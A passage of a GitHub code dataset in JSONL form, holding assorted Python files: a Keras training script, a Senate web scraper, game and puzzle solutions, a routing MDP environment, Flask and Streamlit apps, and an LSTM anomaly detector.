plt.subplots(ncols=2, figsize=(10,4))\nac.plot(history.history['acc'])\nac.plot(history.history['val_acc'])\nac.set_title('model accuracy')\nac.set_xlabel('epoch')\nac.set_ylabel('accuracy')\nac.legend(['acc', 'val_acc'], loc='lower right')\nlos.plot(history.history['loss'])\nlos.plot(history.history['val_loss'])\nlos.set_title('model loss')\nlos.set_xlabel('epoch')\nlos.set_ylabel('loss')\nlos.legend(['loss', 'val_loss'], loc='upper right')\nfig.savefig(\"Img/\"+savename+\".png\")\n# 学習済みのModelを保存\nopen('./Models/'+savename+'.json',\"w\").write(model.to_json())\n# 学習済みの重みを保存\nmodel.save_weights('./Models/'+savename+'.h5')\n\n\n# テストデータに適用\npredict_classes = model.predict_classes(test_x)\n\n# マージ。yのデータは元に戻す\nmg_df = pd.DataFrame({'predict': predict_classes, 'class': np.argmax(test_y, axis=1)})\n\n# confusion matrix\nhge = pd.crosstab(mg_df['class'], mg_df['predict'])\n\nprint(hge)\nprint(\"fitting time: \", cost)\n","repo_name":"araki-t-uec/Works","sub_path":"Keras/dog_ResNet_train.py","file_name":"dog_ResNet_train.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70902684252","text":"import requests\nimport string\nfrom lxml import html\nimport csv\n\n\nclass Senator:\n def __init__(self, name, link):\n self.name = name\n self.link = 'http://www.senato.it{}'.format(link)\n self.parties = []\n\n def set_parties(self, parties):\n self.parties = parties\n\n def __str__(self):\n return 'Senator: {}, url {}, parties {}'.format(self.name, self.link, self.parties)\n\n\ndef extract_senator_names(text):\n tree = html.fromstring(text)\n names = tree.xpath(\"//div[contains(@class, 'linkSenatore')]/p[1]/a/text()\")\n links = tree.xpath(\"//div[contains(@class, 'linkSenatore')]/p[1]/a/@href\")\n\n if len(names) is len(links):\n return [Senator(name, links[index]) for index, name in enumerate(names)]\n else:\n print('mmhh')\n\n\ndef get_all_senators(base_url):\n names_links = []\n for letter in string.ascii_lowercase:\n formatted_url = base_url.format(alphabet_letter=letter)\n print('Getting {}'.format(formatted_url))\n response = requests.get(formatted_url)\n\n if response.status_code == 200:\n name_link = extract_senator_names(response.text)\n names_links.extend(name_link)\n else:\n print('No senators at {}'.format(formatted_url))\n return names_links\n\n\ndef get_parties_from(link):\n response = requests.get(link)\n if response.status_code == 200:\n tree = html.fromstring(response.text)\n parties = tree.xpath(\"//a[starts-with(@href, 'http://www.senato.it/loc/link.asp?tipodoc=sgrp')]/text()\")\n return [party.strip() for party in parties]\n else:\n print('mmh. response was {}'.format(response))\n\n\ndef write_to_csv(legislature, senators_with_parties):\n filename = 'senators_and_parties/senators_parties_legislature_{}.csv'.format(legislature)\n print(\"Writing senators for legislature {} to file {}\".format(legislature, filename))\n data = [['NAME', 'PARTIES']]\n for senator in senators_with_parties:\n data.append([senator.name, ';'.join(senator.parties)])\n\n with open(filename, 'w+',\n encoding='utf-8') as myFile:\n writer = csv.writer(myFile, lineterminator='\\n')\n writer.writerows(data)\n\n\nif __name__ == '__main__':\n for legislature in [14, 15, 16, 17]:\n print('Getting legislature {}'.format(legislature))\n base_url = 'http://www.senato.it/leg/{legislature}/BGT/Schede/Attsen/Sen{{alphabet_letter}}.html'\n\n senators = get_all_senators(base_url.format(legislature=legislature))\n print(\"Got {} senators for legislature {}\".format(len(senators), legislature))\n\n for index, senator in enumerate(senators):\n print('Getting parties for senator {}/{}'.format(index + 1, len(senators)))\n senator.set_parties(get_parties_from(senator.link))\n\n write_to_csv(legislature, senators)\n print(\"Writing complete for legislature {}\".format(legislature))\n","repo_name":"damianiroberta/Italian-senate-amendments","sub_path":"senators_names.py","file_name":"senators_names.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19437811571","text":"from StartUp.Boardgame.cell import Cell\n\n\ndef surrounding_area(row, column):\n \"\"\"\n :param row:\n :param column:\n :return: Program returns all the cells' indexes surrounding the given cell's row and column\n \"\"\"\n return [row - 1, column - 1], [row - 1, column], [row - 1, column + 1], \\\n [row, column - 1], [row, column], [row, column + 1], \\\n [row + 1, column - 1], [row + 1, column], [row + 1, column + 1]\n\n\ndef cleanup(no_go_zone):\n \"\"\"\n :param no_go_zone: A list of indexes\n :return: Program gets rid of duplicates and indexes that don't exist on the board and returns that list\n \"\"\"\n s = []\n for list in no_go_zone:\n if list not in s:\n if 0 <= list[0] <= 9 and 0 <= list[1] <= 9:\n s.append(list)\n\n return s\n\ndef get_int_from_letter(letter):\n \"\"\"\n :param letter:\n :return: Program returns the letter's index\n \"\"\"\n if letter.upper() == \"A\": return 0\n if letter.upper() == \"B\": return 1\n if letter.upper() == \"C\": return 2\n if letter.upper() == \"D\": return 3\n if letter.upper() == \"E\": return 4\n if letter.upper() == \"F\": return 5\n if letter.upper() == \"G\": return 6\n if letter.upper() == \"H\": return 7\n if letter.upper() == \"I\": return 8\n if letter.upper() == \"J\": return 9\n raise TypeError(f\"{letter} is outside the ocean! (Valid letters are between A and J - including both)\")\n\n\ndef get_letter_from_int(x):\n \"\"\"\n :param x:\n :return: Program returns the letter of that index\n \"\"\"\n if x == 0: return \"A\"\n if x == 1: return \"B\"\n if x == 2: return \"C\"\n if x == 3: return \"D\"\n if x == 4: return \"E\"\n if x == 5: return \"F\"\n if x == 6: return \"G\"\n if x == 7: return \"H\"\n if x == 8: return \"I\"\n if x == 9: return \"J\"\n raise TypeError(f\"{x} is outside the ocean! (Valid numbers are between 0 and 9 - including both)\")\n\ndef order_in_cells(list):\n \"\"\"\n :param list: A list of cells\n :return: Returns a list of cells similar to the first one but without their duplicates and without the cells\n that are \"out of the ocean\"\n \"\"\"\n # s = []\n # for cell in list:\n # if cell not in s:\n # if 0 <= cell.row <= 9 and 0 <= cell.column <= 9:\n # s.append(cell)\n\n l = list[:]\n for i in range (0,len(list)):\n for j in range(i+1, len(list)):\n if list[i].row==list[j].row and list[i].column==list[j].column:\n try:\n l.remove(list[j])\n except ValueError:\n pass\n if list[j].row<0 or list[j].row>9 or list[j].column<0 or list[j].column>9:\n try:\n l.remove(list[j])\n except ValueError:\n pass\n return l\n\n\ndef sunken_check(cell, one_way, another_way, player, board):\n \"\"\"\n Program goes along the row/column and checks all the cells for cell.ship==True until it finds a\n cell that has no ship on it (cell.ship=False) - when the program stops going that way.\n Every cell that is a \"good cell\" (meaning cell.ship=True) is appended in a list \"good_cells\".\n\n :param cell:\n :param one_way: parameter will either be the \"l\" cell (for left) or \"u\" cell (for up)\n :param another_way: parameter will either be \"r\" cell (for right) or \"d\" cell (for down)\n :param player: either human or computer\n :param board: either human's board or computer's board\n :return: A list of all the cells that are part of the ship\n \"\"\"\n good_cells = []\n if one_way.checked == one_way.ship == True: good_cells.append(one_way)\n if another_way.checked == another_way.ship == True: good_cells.append(another_way)\n if one_way.row == another_way.row:\n for i in range(one_way.column + 1, 10):\n current_cell = player.get_cell(board, cell.row, i)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n for j in range(another_way.column - 1, -1, -1):\n current_cell = player.get_cell(board, cell.row, j)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n else:\n for i in range(one_way.row + 1, 10):\n current_cell = player.get_cell(board, i, cell.column)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n for j in range(another_way.row - 1, -1, -1):\n current_cell = player.get_cell(board, j, cell.column)\n if current_cell.ship == False:\n break\n else:\n good_cells.append(current_cell)\n good_cells = order_in_cells(good_cells)\n # print(good_cells)\n return good_cells\n\n\ndef l_r_u_d_cells(cell, player, board):\n \"\"\"\n :param cell:\n :param player:\n :param board:\n :return: Function returns the cell to the left, right, up and down (in that order) of the give cell parameter\n \"\"\"\n if cell.column != 0:\n l_cell = player.get_cell(board, cell.row, cell.column - 1)\n else:\n l_cell = Cell(cell.row, cell.column, False, True)\n if cell.column != 9:\n r_cell = player.get_cell(board, cell.row, cell.column + 1)\n else:\n r_cell = Cell(cell.row, cell.column, False, True)\n if cell.row != 0:\n u_cell = player.get_cell(board, cell.row - 1, cell.column)\n else:\n u_cell = Cell(cell.row, cell.column, False, True)\n if cell.row != 9:\n d_cell = player.get_cell(board, cell.row + 1, cell.column)\n else:\n d_cell = Cell(cell.row, cell.column, False, True)\n return l_cell, r_cell, u_cell, d_cell\n","repo_name":"VaroDiana917/Battleship-BoardGame","sub_path":"StartUp/Functions/functionalities.py","file_name":"functionalities.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41494700600","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n dic_row = [{} for _ in range(9)]\n dic_col = [{} for _ in range(9)]\n dic_box = [{} for _ in range(9)]\n \n for i in range(9):\n for j in range(9):\n if board[i][j] != \".\":\n num = int(board[i][j])\n box = (i // 3) * 3 + j // 3\n \n dic_row[i][num] = dic_row[i].get(num, 0) + 1\n dic_col[j][num] = dic_col[j].get(num, 0) + 1\n dic_box[box][num] = dic_box[box].get(num, 0) + 1\n \n if dic_row[i][num] > 1 or dic_col[j][num] > 1 or dic_box[box][num] > 1:\n return False\n \n return True","repo_name":"wangzihao0214/Leetcode","sub_path":"36. Valid Sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34674014518","text":"import sys, math\nfrom collections import deque\n\ninput = sys.stdin.readline\nINF = sys.maxsize\n\n\ndef get_change_count(arr, row, col, answer1, answer2):\n question = [i[col - 8 : col] for i in arr[row - 8 : row]]\n\n result1, result2 = 0, 0\n for i in range(8):\n for j in range(8):\n if question[i][j] != answer1[i][j]:\n result1 += 1\n\n if question[i][j] != answer2[i][j]:\n result2 += 1\n\n return min(result1, result2)\n\n\ndef get_answer():\n answer1 = [[None for _ in range(8)] for _ in range(8)]\n answer2 = [[None for _ in range(8)] for _ in range(8)]\n for i in range(8):\n for j in range(8):\n if i % 2 == 0 and j % 2 == 1:\n answer1[i][j] = \"R\"\n answer2[i][j] = \"B\"\n\n elif i % 2 == 1 and j % 2 == 0:\n answer1[i][j] = \"R\"\n answer2[i][j] = \"B\"\n\n elif i % 2 == 1 and j % 2 == 1:\n answer1[i][j] = \"B\"\n answer2[i][j] = \"R\"\n\n elif i % 2 == 0 and j % 2 == 0:\n answer1[i][j] = \"B\"\n answer2[i][j] = \"R\"\n\n return answer1, answer2\n\n\ndef solve():\n Min = INF\n m, n = map(int, input().split(\" \"))\n arr = [list(input().rstrip()) for _ in range(m)]\n\n answer1, answer2 = get_answer()\n\n for i in range(8, m + 1):\n for j in range(8, n + 1):\n Min = min(Min, get_change_count(arr, i, j, answer1, answer2))\n\n print(Min)\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"kkIIun/Tobigs18_assignment","sub_path":"week3/Algorithm/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34169209298","text":"from subprocess import call\nfrom pymouse import PyMouse\nfrom pykeyboard import PyKeyboard\nimport time\n\nk = PyKeyboard()\nm = PyMouse()\nx_dim, y_dim = m.screen_size()\n\n\n# init minimize the execution window\nk.press_key('Command')\nk.tap_key('h')\nk.release_key('Command')\ntime.sleep(2)\nm.click(x_dim/2, y_dim/2, 1)\n\n\n# 301 - 770\nfor page in range(301, 770):\n m.click(154, 112, 1)\n time.sleep(0.1)\n k.tap_key('delete', n=3)\n time.sleep(0.1)\n k.type_string(str(page))\n time.sleep(0.1)\n k.tap_key('return')\n time.sleep(2)\n\n call([\"screencapture\", \"-R523,128,608,757\", \"page_\" + str(page) + \".png\"])\n","repo_name":"lukasfroehlich1/scrape-textbook","sub_path":"screen-cap.py","file_name":"screen-cap.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73384401372","text":"from app import app, genAbstract, logger\nfrom flask import render_template, request, jsonify, json, Response\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n summary_text = \"test\"\n return render_template('index.html', summary=summary_text)\n\n\n@app.route('/summary', methods=['POST'])\ndef get_summary():\n data = json.loads(request.form.get('data'))\n title = data['title']\n content = data['content']\n if title is None or len(title) == 0 or content is None or len(content) == 0:\n return jsonify({'status': -1, 'text': '参数异常'});\n else:\n logger.debug('title:%s \\n content:%s\\n' % (title, content))\n text = genAbstract.summarize(content, title)\n return jsonify({'status': 'OK', 'text': text});\n\n","repo_name":"HemingPang/GenAbstract","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36770654407","text":"import streamlit as st\nimport numpy as np\nimport pickle\nfrom explore_page import compute_cost, compute_gradient, gradient_descent\n\n# Load the pickled model\ndef load_model():\n with open('saved_steps.pkl', 'rb') as file:\n data = pickle.load(file)\n return data\n\ndata = load_model()\n\npredicted_loaded = data[\"model\"]\npopulation = data[\"Population\"]\n\n\n\n\n\n\ndef show_predict_page():\n st.title(\"Restaurant Profit Prediction App\")\n\n #population = st.slider(\"Population\", 0, 100, 50) \n population = st.number_input(\"type in the population\", 0, 100, 50)\n x_train = data['Population']\n # y_train = data['Profit']\n #initial_w = 0\n #initial_b = 0\n\n # some gradient descent values\n #iterations = 150\n #alpha = 0.01\n\n\n #w,b,_,_ = gradient_descent(x_train, y_train, initial_w, initial_b, compute_cost,\n # compute_gradient, alpha, iterations)\n w = 1.17\n b = -3.63\n\n ok = st.button(\"Predict Profit\")\n if ok:\n m = x_train.shape[0]\n predicted = np.zeros(m)\n for i in range(m):\n predicted[i] = w * x_train[i] + b\n\n profit = population * w +b \n st.subheader(f\"The profit of the restaurant is ${profit*10000:.2f} dollars\")\n #st.success(f\"The profit of the restaurant is {profit:.2f} dollars\")\n #st.write(\"The predicted profit is\", predicted)\n #predict_1 = 3.5 * w + b\n","repo_name":"RaphSmart/Restaurant-profit-prediction","sub_path":"predict_page.py","file_name":"predict_page.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30161517997","text":"\"\"\"\r\n\n\n **Nesting level** , in this challenge, refers to the depth of parentheses\naround an integer. For example, in the string `\"(5((10)8))\"`, 5 has a nesting\nlevel of 1 because it has one set of parentheses around it, 10 has a nesting\nlevel of 3 because it has 3 sets of parentheses around it, and 8 has a nesting\nlevel of 2.\n\nWe can score this string by multiplying each number times its nesting level\nand then summing the results:\n\n \"(5((10)8))\" ➞ 5*1 + 10*3 + 8*2 ➞ 51\n\nCreate a function that takes a string as its argument and returns its score.\n\n### Examples\n\n score_it(\"()\") ➞ 0\n \n score_it(\"4(123)\") ➞ 123\n # 4*0 + 123*1 = 123\n \n score_it(\"((((1)2)3)4)\") ➞ 20\n # 1*4 + 2*3 + 3*2 + 4*1 = 20\n \n score_it(\"(6)8((34(7)))\") ➞ 95\n # 6*1 + 8*0 + 34*2 + 7*3 = 95\n\n### Notes\n\n * The nesting for all test cases is balanced and logically consistent (there are no missing or extra parentheses).\n * Test cases contain only positive integers.\n\n\"\"\"\r\n\nimport re\ndef score_it(s):\n score = 0\n s = re.sub(r'[^\\d()]', '', s)\n for match in re.finditer(r'\\d+', s):\n num = int(s[match.start():match.end()])\n depth = sum([1 if c == '(' else -1 if c == ')' else 0 for c in s[:match.start()]])\n score += num * depth\n return score\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"zp64GNJQpZyGpYWL8_8.py","file_name":"zp64GNJQpZyGpYWL8_8.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6533838528","text":"class Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n\n time: O(n)\n space: O(1)\n \"\"\"\n n = len(s)\n for l in range(n // 2):\n r = (n - 1) - l\n # swap\n s[l], s[r] = s[r], s[l]\n\n","repo_name":"meowpunch/meowrithm","sub_path":"python/leetcode/Reverse String.py","file_name":"Reverse String.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10986331913","text":"\"\"\"\nA classic Aircraft routing problem described in Nilm 2005.\n\"\"\"\n\nimport logging\nimport sys\nimport random\nimport os\n\nimport numpy as np\nimport pickle\nfrom gym import utils\nfrom gym.envs.toy_text import discrete\n\nfrom math import factorial\nimport matplotlib.pyplot as plt\nimport math\nfrom .common import render_state\n\nlogger = logging.getLogger(__name__)\n\n# Action\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\n\nclass ExpRoutingRandom(discrete.DiscreteEnv):\n \"\"\"\n The aircraft must go through a stormy area.\n\n The space is a N x N grid.\n\n Denote A as the aircraft, E as the end point.\n\n X\n X\n A X E\n X\n X\n\n Here Xs are a stormy area that has some chance of storm.\n\n For simplicity, we place A at the middle of very left.\n E at the middle of very right.\n\n The storm follow a transition matrix of 2^k * 2^k.\n Each entry is the probability transit from one possible state to the other.\n\n Assume k obstacle.\n \"\"\"\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second': 50\n }\n\n def __init__(self, desc=None):\n pass\n\n def set(self, config):\n GRID_SIZE = config.grid_size\n K = config.k\n assert 2 * K + 1 <= GRID_SIZE\n RUN_ID = config.run_id # Generate and store on a differently generated randomness under the same setting\n MAP_FILE = 'random_store/GS_%d_K_%d_RUN_%d.npy' % (GRID_SIZE, K, RUN_ID)\n AREA_UP_BOUND = math.ceil(GRID_SIZE * GRID_SIZE / float(K))\n\n # Q Single\n Q_SINGLE_G2G = config.g2g\n Q_SINGLE_G2B = 1. - Q_SINGLE_G2G\n Q_SINGLE_B2B = config.b2b\n Q_SINGLE_B2G = 1. - Q_SINGLE_B2B\n # P Perturbation\n E = config.epsilon # always added to 2B and decreased to 2G\n P_SINGLE_G2G = Q_SINGLE_G2G - E\n P_SINGLE_G2B = 1. - P_SINGLE_G2G\n P_SINGLE_B2B = Q_SINGLE_B2B + E\n P_SINGLE_B2G = 1. - P_SINGLE_B2B\n\n # Cost\n COST_NORMAL = 1.\n COST_STORM = config.cost_storm\n\n if os.path.isfile(MAP_FILE):\n each_storm_map_bbox = np.load(MAP_FILE)\n else:\n each_storm_map_bbox = np.zeros((K, 4), dtype=int) # storm areas can overlap\n for j in range(K):\n area = np.inf\n while area > AREA_UP_BOUND or area <= 0:\n bbox_left = np.random.randint(0, GRID_SIZE - 1)\n bbox_right = np.random.randint(0, GRID_SIZE - 1)\n bbox_left, bbox_right = min(bbox_left, bbox_right), max(bbox_left, bbox_right)\n bbox_top = np.random.randint(0, GRID_SIZE - 1)\n bbox_bottom = np.random.randint(0, GRID_SIZE - 1)\n bbox_top, bbox_bottom = min(bbox_top, bbox_bottom), max(bbox_top, bbox_right)\n area = (bbox_bottom - bbox_top) * (bbox_right - bbox_left)\n each_storm_map_bbox[j] = np.array([bbox_left, bbox_right, bbox_top, bbox_bottom])\n np.save(MAP_FILE, each_storm_map_bbox)\n\n self.nrow, self.ncol = nrow, ncol = (GRID_SIZE, GRID_SIZE)\n\n k = K\n tk = 2**k\n nS = nrow * ncol * tk\n nA = 4\n\n # Get the binary: 12 -> 01100 -> [False, True, True, False, False], suppose K is 5\n fs = '{0:0' + str(K) + 'b}'\n\n def stormID2BoolList(id):\n return [int(x) > 0 for x in fs.format(id)]\n\n # calc distribution probability, treat p to be the probability of flip, 1-p fr hold\n def calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B, prob_G2G, prob_G2B, prob_B2G, prob_B2B):\n return (prob_G2G ** count_G2G) * (prob_G2B ** count_G2B) * (prob_B2G ** count_B2G) * (prob_B2B ** count_B2B)\n\n # (row, col, storm_index) to stateID\n def to_s(row, col, storm_index):\n return nrow * ncol * storm_index + row * ncol + col\n\n # step\n def inc(row, col, a):\n if a == 0: # left\n col = max(col - 1, 0)\n elif a == 1: # down\n row = min(row + 1, nrow - 1)\n elif a == 2: # right\n col = min(col + 1, ncol - 1)\n elif a == 3: # up\n row = max(row - 1, 0)\n return (row, col)\n\n terminal_pos = (nrow // 2, ncol - 1)\n\n # obtain_storm_maps\n storm_maps = np.zeros((tk, nrow, ncol)).astype('float64')\n for i in range(tk):\n bool_list = stormID2BoolList(i)\n for j in range(len(bool_list)):\n if bool_list[j]: # j-th storm is on\n storm_maps[i,\n each_storm_map_bbox[j][2]:each_storm_map_bbox[j][3],\n each_storm_map_bbox[j][0]:each_storm_map_bbox[j][1]\n ] = 1.\n\n # Conventions: Q is the nominal distribution and P is the perturbed one\n # Define Qs: only care about the transformation between storms\n # Define Ps: only care about the transformation between storms\n Qs = np.zeros((tk, tk), np.float32)\n Ps = np.zeros((tk, tk), np.float32)\n for i in range(tk):\n bool_list_i = stormID2BoolList(i)\n for j in range(tk):\n bool_list_j = stormID2BoolList(j)\n count_G2G = sum([not bool_list_i[z] and not bool_list_j[z] for z in range(k)])\n count_G2B = sum([not bool_list_i[z] and bool_list_j[z] for z in range(k)])\n count_B2G = sum([bool_list_i[z] and not bool_list_j[z] for z in range(k)])\n count_B2B = sum([bool_list_i[z] and bool_list_j[z] for z in range(k)])\n Qs[i, j] = calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B,\n Q_SINGLE_G2G, Q_SINGLE_G2B, Q_SINGLE_B2G, Q_SINGLE_B2B)\n Ps[i, j] = calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B,\n P_SINGLE_G2G, P_SINGLE_G2B, P_SINGLE_B2G, P_SINGLE_B2B)\n\n # Put Ps into P, Qs into Q:\n Q = {s: {a: [] for a in range(nA)} for s in range(nS)}\n P = {s: {a: [] for a in range(nA)} for s in range(nS)}\n Qmatrix = np.zeros((nS, nA, nS), dtype=np.float64)\n Pmatrix = np.zeros((nS, nA, nS), dtype=np.float64)\n for row in range(nrow):\n for col in range(ncol):\n for old_storm_id in range(tk):\n old_state_id = to_s(row, col, old_storm_id)\n # Note: cost is irrelavant to the new state!\n if storm_maps[old_storm_id, row, col] == 1:\n cost = COST_STORM\n else:\n cost = COST_NORMAL\n for new_storm_id in range(tk):\n for a in range(4):\n newrow, newcol = inc(row, col, a)\n new_state_id = to_s(newrow, newcol, new_storm_id)\n done1 = (row, col) == terminal_pos\n done2 = (newrow, newcol) == terminal_pos\n P[old_state_id][a].append(\n (Ps[old_storm_id, new_storm_id], new_state_id,\n cost, done1 or done2))\n Pmatrix[old_state_id, a, new_state_id] = Ps[\n old_storm_id][new_storm_id]\n Q[old_state_id][a].append(\n (Qs[old_storm_id, new_storm_id], new_state_id,\n cost, done1 or done2))\n Qmatrix[old_state_id, a, new_state_id] = Qs[\n old_storm_id][new_storm_id]\n\n # Take home\n self.storm_maps = storm_maps\n self.Qs = Qs\n self.Q = Q\n self.Qmatrix = Qmatrix\n self.Ps = Ps\n self.P = P\n self.Pmatrix = Pmatrix\n\n self.k = k\n self.nrow = nrow\n self.ncol = ncol\n self.terminal_pos = terminal_pos\n self.nS = nS\n self.nA = nA\n self.tk = tk\n\n # new object\n isd = np.zeros((tk, nrow, ncol)).astype('float64')\n isd[0, nrow // 2, 0] = 1\n super(ExpRoutingRandom, self).__init__(nS, nA, P, isd)\n\n def reset(self, seed=None):\n random.seed(seed)\n np.random.seed(seed)\n return super(ExpRoutingRandom, self).reset()\n\n def render(self, random='human', close=False):\n render_state(self.s, self.nrow, self.ncol, self.storm_maps, self.terminal_pos)\n","repo_name":"ByzanTine/RobustMDP","sub_path":"nominal-mdp/test_env/envs/exp_routing_random.py","file_name":"exp_routing_random.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29408022194","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Dropout, RepeatVector, TimeDistributed\nfrom datetime import timedelta\nfrom data_import import read_dataset\n\n\ndef create_train_set(ts, training_ratio, lookback):\n training_size = int(training_ratio * ts.shape[0])\n train_ts = ts[:training_size]\n\n x = train_ts[['value']]\n y = train_ts['value']\n\n x_train = []\n y_train = []\n\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_train.append(v)\n y_train.append(y.iloc[i + lookback])\n\n return x_train, y_train\n\n\ndef create_test_set(ts, training_ratio, lookback):\n training_size = int(training_ratio * ts.shape[0])\n test_ts = ts[training_size - lookback:]\n\n x = test_ts[['value']]\n y = test_ts['value']\n\n x_test = []\n y_test = []\n\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_test.append(v)\n y_test.append(y.iloc[i + lookback])\n\n return np.array(x_test)\n\n\ndef create_forecast_set(ts, lookback):\n forecast_ts = ts.copy()\n\n x = forecast_ts[['value']]\n y = forecast_ts['value']\n\n x_forecast = []\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_forecast.append(v)\n\n return np.array(x_forecast)\n\n\ndef train(all_ts, training_ratio, lookback, saved_model_name=None):\n scaler = MinMaxScaler(feature_range=(0, 1))\n all_ts_df = pd.DataFrame(all_ts[0])\n\n for series in all_ts[1:]:\n all_ts_df = all_ts_df.append(series)\n\n scaler.fit(all_ts_df)\n\n x_train = []\n y_train = []\n\n for series in all_ts:\n scaled_ts = series.copy()\n scaled_ts['value'] = scaler.transform(scaled_ts[['value']])\n train_set = create_train_set(scaled_ts, training_ratio, lookback)\n\n x_train += train_set[0]\n y_train += train_set[1]\n\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n\n model = Sequential()\n model.add(LSTM(units=64, input_shape=(x_train.shape[1], x_train.shape[2])))\n model.add(Dropout(rate=0.2))\n\n model.add(RepeatVector(n=x_train.shape[1]))\n model.add(LSTM(units=64, return_sequences=True))\n model.add(Dropout(rate=0.2))\n\n model.add(TimeDistributed(Dense(x_train.shape[2])))\n model.compile(optimizer='adam', loss='mae')\n\n model.fit(x_train, y_train, epochs=4, batch_size=64, validation_split=0.1, shuffle=False)\n\n if saved_model_name is not None:\n model.save('models/detect/' + saved_model_name)\n\n return model\n\n\ndef test_forecast(ts, model, lookback, threshold, training_ratio=None):\n scaler = MinMaxScaler()\n test_ts = ts.copy()\n test_ts['value'] = scaler.fit_transform(test_ts[['value']])\n\n if training_ratio is not None:\n x_test = create_test_set(test_ts, training_ratio, lookback)\n training_size = int(training_ratio * ts.shape[0])\n test_ts = test_ts[training_size - lookback:]\n else:\n x_test = create_forecast_set(test_ts, lookback)\n\n # threshold = scaler.transform([[threshold]])[0][0]\n\n x_test_pred = model.predict(x_test)\n test_mae_loss = np.mean(np.abs(x_test_pred - x_test), axis=1)\n\n test_score_df = pd.DataFrame(index=test_ts[lookback:].index)\n test_score_df['loss'] = test_mae_loss\n test_score_df['threshold'] = threshold\n test_score_df['anomaly'] = test_score_df.loss > test_score_df.threshold\n test_score_df['value'] = test_ts[lookback:].value\n\n plt.figure(figsize=(16, 8))\n plt.grid()\n plt.title('Error')\n plt.plot(test_score_df.index, test_score_df.loss, label='loss')\n plt.plot(test_score_df.index, test_score_df.threshold, label='threshold')\n plt.xticks(rotation=25)\n plt.legend()\n\n anomalies = test_score_df[test_score_df.anomaly == True]\n anomalies.reindex()\n\n corrected_dates = []\n\n # sync anomalies points with the correct time series points\n for date in anomalies.index:\n day_before = (date - timedelta(days=2)).date()\n corrected_dates.append(day_before)\n anomalies.loc[date, 'value'] = test_ts.loc[str(day_before), 'value']\n\n anomalies.index = corrected_dates\n\n plt.figure(figsize=(16, 8))\n plt.grid()\n plt.title('Anomalies')\n plt.plot(test_ts['value'], zorder=1)\n plt.scatter(anomalies.index, anomalies['value'], color='red', linewidths=1, zorder=2)\n plt.show()\n\n\nif __name__ == '__main__':\n dataset = 'datasets/nasdaq2007_17.csv'\n n = 400\n mae_threshold = 0.15\n save_model = False\n pretrained_model = None # 'models/detect/model1'\n\n # read command line arguments\n for i, arg in enumerate(sys.argv):\n if arg == '-model':\n pretrained_model = sys.argv[i + 1]\n if arg == '-n':\n n = int(sys.argv[i + 1])\n if arg == '-d':\n dataset = sys.argv[i + 1]\n if arg == '-save_model':\n save_model = True\n if arg == '-mae':\n mae_threshold = float(sys.argv[i + 1])\n\n try:\n all_ts, _ = read_dataset(dataset, n)\n except:\n print('Error in reading dataset!')\n exit()\n\n training_ratio = 0.7\n lookback = 200\n\n # use pretrained model\n if pretrained_model is not None:\n try:\n model = load_model(pretrained_model)\n except:\n print('Error in loading pretrained model!')\n exit()\n # train and test model\n else:\n try:\n if save_model:\n model_name = input(\"Saved Model Name: \")\n model = train(all_ts, training_ratio, lookback, model_name)\n else:\n model = train(all_ts, training_ratio, lookback)\n except:\n print('Error while training model!')\n try:\n if pretrained_model is not None:\n for ts in all_ts:\n test_forecast(ts, model, lookback, mae_threshold)\n else:\n for ts in all_ts:\n test_forecast(ts, model, lookback, mae_threshold, training_ratio)\n except:\n print('Error while making forecasts')\n exit()\n","repo_name":"Kosmai/LSH_kNN_Clustering","sub_path":"Time_Series_Analysis/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} 